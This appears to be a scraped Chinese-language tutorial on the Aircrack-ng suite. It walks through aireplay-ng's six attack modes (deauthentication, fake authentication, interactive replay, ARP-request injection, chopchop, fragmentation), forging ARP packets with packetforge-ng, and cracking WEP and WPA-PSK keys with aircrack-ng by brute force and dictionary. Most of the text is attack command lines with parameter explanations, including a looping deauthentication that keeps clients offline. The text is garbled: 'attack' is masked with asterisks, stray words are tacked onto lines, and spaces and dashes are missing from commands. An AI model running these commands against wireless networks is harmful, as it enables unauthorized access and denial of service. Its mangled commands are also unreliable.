Aireplay-ng的6種***模式詳解ide
-0Deautenticate衝突模式
使已經鏈接的合法客戶端強制斷開與路由端的鏈接,使其從新鏈接。在從新鏈接過程當中得到驗證數據包,從而產生有效ARPrequest。若是一個客戶端連在路由端上,可是沒有人上網以產生有效數據,此時,即便用-3也沒法產生有效ARPrequest。因此此時須要用-0***模式配合,-3***纔會被馬上激活。
aireplay-ng-010–a<apmac>-c<mymac>wifi0
參數說明:
【-0】:衝突***模式,後面跟發送次數(設置爲0,則爲循環***,不停的斷開鏈接,客戶端沒法正常上網)
【-a】:設置ap的mac
【-c】:設置已鏈接的合法客戶端的mac。若是不設置-c,則斷開全部和ap鏈接的合法客戶端。
aireplay-ng-3-b<apmac>-h<mymac>wifi0
注:使用此***模式的前提是必須有經過認證的合法的客戶端鏈接到路由器學習
-1fakeauthcount假裝客戶端鏈接
這種模式是假裝一個客戶端和AP進行鏈接。
這步是無客戶端的研究學習的第一步,由於是無合法鏈接的客戶端,所以須要一個假裝客戶端來和路由器相連。爲讓AP接受數據包,必須使本身的網卡和AP關聯。若是沒有關聯的話,目標AP將忽略全部從你網卡發送的數據包,IVS數據將不會產生。用-1假裝客戶端成功鏈接之後才能發送注入命令,讓路由器接受到注入命令後纔可反饋數據從而產生ARP包。
aireplay-ng-10–e<apessid>-a<apmac>-h<mymac>wifi0
參數說明:
【-1】:假裝客戶端鏈接模式,後面跟延時
【-e】:設置ap的essid
【-a】:設置ap的mac
【-h】:設置假裝客戶端的網卡MAC(即本身網卡mac)router
-2Interactive交互模式
這種***模式是一個抓包和提數據發***包,三種集合一塊兒的模式
1.這種模式主要用於研究學習無客戶端,先用-1創建虛假客戶端鏈接而後直接發包***,
aireplay-ng-2-p0841-cff:ff:ff:ff:ff:ff-b<apmac>-h<mymac>wifi0
參數說明:
【-2】:交互***模式
【-p】:設置控制幀中包含的信息(16進制),默認採用0841
【-c】:設置目標mac地址
【-b】:設置ap的mac地址
【-h】:設置假裝客戶端的網卡MAC(即本身網卡mac)
2.提取包,發送注入數據包
aireplay-ng-2–r<file>-x1024wifi0
發包***.其中,-x1024是限定發包速度,避免網卡死機,能夠選擇1024。
-3ARP-request注入***模式
這種模式是一種抓包後分析重發的過程這種***模式頗有效。既能夠利用合法客戶端,也能夠配合-1利用虛擬鏈接的假裝客戶端。若是有合法客戶端那通常須要等幾分鐘,讓合法客戶端和ap之間通訊,少許數據就可產生有效ARPrequest纔可利用-3模式注入成功。若是沒有任何通訊存在,不能獲得ARPrequest.,則這種***就會失敗。若是合法客戶端和ap之間長時間內沒有ARPrequest,能夠嘗試同時使用-0***.
若是沒有合法客戶端,則能夠利用-1創建虛擬鏈接的假裝客戶端,鏈接過程當中得到驗證數據包,從而產生有效ARPrequest。再經過-3模式注入。
aireplay-ng-3-b<apmac>-h<mymac>-x512wifi0
參數說明:
【-3】:arp注入***模式
【-b】:設置ap的mac
【-h】:設置
【-x】:定義每秒發送數據戶包的數量,可是最高不超過1024,建議使用512(也可不定義)ip
-4Chopchop***模式,用以得到一個包含密鑰數據的xor文件
這種模式主要是得到一個可利用包含密鑰數據的xor文件,不能用來解密數據包。而是用它來產生一個新的數據包以便咱們能夠進行注入。
aireplay-ng-4-b<apmac>-h<mymac>wifi0
參數說明:
【-b】:設置須要研究學習的AP的mac
【-h】:設置虛擬假裝鏈接的mac(即本身網卡的mac)ci
-5fragment碎片包***模式用以得到PRGA(包含密鑰的後綴爲xor的文件)
這種模式主要是得到一個可利用PRGA,這裏的PRGA並非wepkey數據,不能用來解密數據包。而是用它來產生一個新的數據包以便咱們能夠進行注入。其工做原理就是使目標AP從新廣播包,當AP重廣播時,一個新的IVS將產生,咱們就是利用這個來研究學習!
aireplay-ng-5-b<apmac>-h<mymac>wifi0
【-5】:碎片包***模式
【-b】:設置ap的mac
【-h】:設置虛擬假裝鏈接的mac(即本身網卡的mac)
Packetforge-ng:數據包製造程序
Packetforge-ng<mode><options>
Mode
【-0】:僞造ARP包
packetforge-ng-0-a<apmac>-h<mymac>wifi0–k255.255.255.255-l255.255.255.255–y<.xorfile>-wmrarp參數說明:
【-0】:假裝arp數據包
【-a】:設置ap的mac
【-h】設置虛擬假裝鏈接的mac(即本身的mac)
【-k】<ip[:port]>說明:設置目標文件IP和端口
【-l】<ip[:port]>說明:設置源文件IP和端口
【-y】<file>說明:從xor文件中讀取PRGA。後面跟xor的文件名。
【-w】設置假裝的arp包的文件名
Aircrack-ng:WEP及WPA-PSKkey研究學習主程序
Aircrack-ng[optin]<.cap/.ivsfile>
Optin
aircrack-ng-n64-b<apmac>name-01.ivs)
參數說明:
【-n】:設置WEPKEY長度(64/128/152/256/512)
aircrack-ng-x-f2name-01h.cap
參數說明:
【-x】:設置爲暴力研究學習模式
【-f】:設置複雜程度,wep密碼設置爲1,wpa密碼設置爲2
aircrack-ng-wpassword.txtciw.cap
【-w】:設置爲字典研究學習模式,後面跟字典文件,再後面跟是咱們即時保存的那個捕獲到WPA驗證的抓包文件路由